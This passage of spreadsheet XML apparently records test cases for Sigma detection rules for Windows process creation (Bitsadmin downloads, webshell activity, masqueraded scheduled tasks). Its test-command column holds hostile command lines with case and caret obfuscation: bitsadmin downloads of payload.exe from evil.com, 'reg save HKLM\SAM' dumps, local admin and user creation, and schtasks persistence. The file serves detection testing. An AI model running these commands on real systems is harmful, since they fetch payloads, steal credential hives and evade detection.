      </c>
      <c r="H128" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I128" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J128" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K128" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="129" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="43" t="n"/>
      <c r="B129" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C129" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D129" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E129" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /dOWnloAd /PriOrIty high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F129" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G129" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H129" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I129" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J129" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K129" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="130" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="43" t="n"/>
      <c r="B130" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C130" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D130" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E130" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F130" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G130" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H130" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I130" s="43" t="n"/>
      <c r="J130" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K130" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="43" t="n"/>
      <c r="B131" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C131" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D131" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E131" s="36" t="inlineStr">
        <is>
          <t>ping.exe /n 4 10.10.10.10</t>
        </is>
      </c>
      <c r="F131" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G131" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H131" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I131" s="43" t="n"/>
      <c r="J131" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K131" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="132" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="43" t="n"/>
      <c r="B132" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C132" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D132" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E132" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRaNSFER myJob -"download" /PRIoritY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F132" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G132" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H132" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I132" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J132" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K132" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="43" t="n"/>
      <c r="B133" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C133" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D133" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E133" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob -"download" /priority high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F133" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G133" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I133" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J133" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K133" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="43" t="n"/>
      <c r="B134" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C134" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D134" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E134" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TranSfER myJob /"download" -"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F134" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G134" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I134" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J134" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K134" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="135" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="43" t="n"/>
      <c r="B135" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C135" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D135" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E135" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob -"download" /PrIoritY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F135" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G135" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I135" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J135" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K135" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="136" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="43" t="n"/>
      <c r="B136" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C136" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D136" s="36" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E136" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F136" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G136" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I136" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J136" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K136" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="36" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B137" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C137" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D137" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E137" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F137" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G137" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H137" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I137" s="43" t="n"/>
      <c r="J137" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K137" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="138" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="43" t="n"/>
      <c r="B138" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C138" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D138" s="36" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E138" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TRAnsfER myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F138" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G138" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H138" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I138" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J138" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K138" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="43" t="n"/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</row>
    <row r="140" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="36" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B140" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C140" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D140" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E140" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F140" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G140" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H140" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I140" s="43" t="n"/>
      <c r="J140" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K140" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="141" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B141" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C141" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D141" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E141" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" /xml C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F141" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G141" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I141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41" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K141" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="36" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B142" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C142" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D142" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E142" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F142" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G142" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H142" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I142" s="43" t="n"/>
      <c r="J142" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K142" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="143" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="43" t="n"/>
      <c r="B143" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C143" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D143" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E143" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F143" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G143" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H143" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I143" s="43" t="n"/>
      <c r="J143" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K143" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="144" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="43" t="n"/>
      <c r="B144" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C144" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D144" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E144" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F144" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G144" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H144" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I144" s="43" t="n"/>
      <c r="J144" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K144" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="145" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B145" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C145" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D145" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E145" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEATe -"tn" "MyScheduledTask.xml" /xMl C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F145" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G145" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H145" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I145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45" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K145" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="146" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B146" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C146" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D146" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E146" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" /"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F146" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G146" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H146" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I146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46" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K146" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B147" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C147" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D147" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E147" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" -"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F147" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G147" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H147" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I147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47" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K147" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="43" t="n"/>
      <c r="B148" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C148" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D148" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E148" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F148" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G148" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H148" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I148" s="43" t="n"/>
      <c r="J148" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K148" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="149" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B149" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C149" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D149" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E149" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTE /tn "MyScheduledTask.xml" /xML C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F149" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G149" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I149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49" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K149" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="150" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B150" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C150" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D150" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E150" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F150" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G150" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H150" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I150" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J150" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K150" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="151" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B151" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C151" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D151" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E151" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEATE /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F151" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G151" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H151" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I151" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J151" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K151" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B152" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C152" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D152" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E152" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /XmL "C:\temp\masqueraded_payload.txt" /f /"tr" "dummy.xml"</t>
        </is>
      </c>
      <c r="F152" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G152" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H152" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I152" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J152" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K152" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="43" t="n"/>
      <c r="B153" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C153" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D153" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E153" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F153" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G153" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H153" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I153" s="43" t="n"/>
      <c r="J153" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K153" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="154" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B154" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C154" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D154" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E154" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tN "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /"f" /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F154" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G154" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I154" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J154" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K154" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="155" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="43" t="n"/>
      <c r="B155" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C155" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D155" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E155" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F155" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G155" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H155" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I155" s="43" t="n"/>
      <c r="J155" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K155" s="36" t="b">
        <v>1</v>
      </c>
    </row>
